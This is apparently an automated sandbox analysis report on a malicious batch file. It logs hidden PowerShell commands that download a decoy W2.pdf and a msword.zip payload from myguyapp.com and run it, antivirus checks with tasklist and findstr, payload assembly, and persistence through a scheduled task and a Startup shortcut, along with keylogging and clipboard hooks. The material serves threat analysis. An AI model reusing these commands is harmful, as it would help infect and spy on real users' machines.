Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Prostores.com, 00000019.00000000.1775153431.0000000000555000.00000002.00000001.01000000.00000009.sdmp, CineBlend.scr, 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmp, CineBlend.scr, 00000025.00000002.1934138128.0000000000C15000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: msword.exe.14.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: msword.exe.14.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: svchost.exe, 00000007.00000003.1397678041.000001AA08683000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 00000007.00000003.1397678041.000001AA08650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: choice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783919185.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783752868.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1785009950.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, 9W9jJCj9EV.bat	String found in binary or memory: https://myguyapp.com/W2.pdf
Source: tasklist.exe, 00000014.00000002.1771269783.000000000320F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770615869.000000000320E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770485032.0000000003200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdf6
Source: msword.exe, 0000000F.00000002.1734104751.00000000023B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=tin
Source: cmd.exe, 0000001E.00000002.1784753157.0000000000C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFI
Source: tasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/W2.pdfd
Source: msword.exe, 0000000F.00000002.1734013282.0000000002280000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1732489885.000000000075E000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000F.00000002.1734104751.00000000023B0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1758622177.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000003.1757907965.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000002.1760983280.00000000031B0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000012.00000002.1761710944.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771269783.000000000320F000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770615869.000000000320E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000003.1770485032.0000000003200000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000014.00000002.1771514838.0000000003370000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001A.00000002.1827537331.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783919185.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001B.00000002.1783752868.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1785009950.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, 9W9jJCj9EV.bat	String found in binary or memory: https://myguyapp.com/msword.zip
Source: tasklist.exe, 00000014.00000002.1771028960.00000000031E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipr
Source: tasklist.exe, 00000014.00000002.1771514838.0000000003370000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.))
Source: cmd.exe, 0000001E.00000002.1785009950.0000000002E30000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1786134258.0000000003250000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1784753157.0000000000C40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGP
Source: choice.exe, 0000001A.00000002.1827456335.0000000002C98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://myguyapp.com/msword.zip~
Source: Prostores.com, 00000019.00000003.1782800462.0000000003C58000.00000004.00000800.00020000.00000000.sdmp, Presidential.15.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: msword.exe.14.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: Presidential.15.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\677826\Prostores.com

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

15_2_004050F9

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BBF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

33_2_00BBF7C7

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BBF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

33_2_00BBF55C

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

15_2_004044D1

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BD9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

33_2_00BD9FD2

System Summary

Drops large PE files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File dump: msword.exe.14.dr 524295939

Jump to dropped file

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BB4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

33_2_00BB4763

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BA1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

33_2_00BA1B4D

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		15_2_004038AF
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BAF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		33_2_00BAF20D

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\DischargeFlowers
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\StartupDecision
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\GazetteUna
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\PerfumeDiscussions
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\HospitalityCelebrities
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\DrawnScanner
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	File created: C:\Windows\PdasSalaries

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_0040737E	15_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_00406EFE	15_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_004079A2	15_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: 15_2_004049A8	15_2_004049A8
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B68017	33_2_00B68017
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B4E1F0	33_2_00B4E1F0
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B5E144	33_2_00B5E144
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B622A2	33_2_00B622A2
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B422AD	33_2_00B422AD
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B7A26E	33_2_00B7A26E
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B5C624	33_2_00B5C624
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BCC8A4	33_2_00BCC8A4
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B7E87F	33_2_00B7E87F
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B76ADE	33_2_00B76ADE
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BB2A05	33_2_00BB2A05
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BA8BFF	33_2_00BA8BFF
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B5CD7A	33_2_00B5CD7A
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B6CE10	33_2_00B6CE10
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B77159	33_2_00B77159
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B49240	33_2_00B49240
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BD5311	33_2_00BD5311
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B496E0	33_2_00B496E0
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B61704	33_2_00B61704
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B61A76	33_2_00B61A76
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B67B8B	33_2_00B67B8B
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B49B60	33_2_00B49B60
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B67DBA	33_2_00B67DBA
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B61D20	33_2_00B61D20
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00B61FE7	33_2_00B61FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Code function: String function: 004062CF appears 57 times
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: String function: 00B60DA0 appears 46 times
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: String function: 00B5FD52 appears 40 times

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winBAT@62/101@0/3

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BB41FA GetLastError,FormatMessageW,

33_2_00BB41FA

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BA2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		33_2_00BA2010
Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr	Code function: 33_2_00BA1A0B AdjustTokenPrivileges,CloseHandle,		33_2_00BA1A0B

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

15_2_004044D1

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BADD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

33_2_00BADD87

Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe

Code function: 15_2_004024FB CoCreateInstance,

15_2_004024FB

Source: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr

Code function: 33_2_00BB3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

33_2_00BB3A0E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Downloads\W2.pdf

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7896:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bihvhc0a.ue4.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" "

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\System32\cmd.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: 9W9jJCj9EV.bat

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\9W9jJCj9EV.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1716,i,17469338737042705526,11542992222865520441,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 677826
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\677826\Prostores.com Prostores.com N
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\677826\Prostores.com	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DesusertionPath C:\Users\user\AppData\Local\Temp\msword -Force"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1716,i,17469338737042705526,11542992222865520441,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown	Jump to behavior
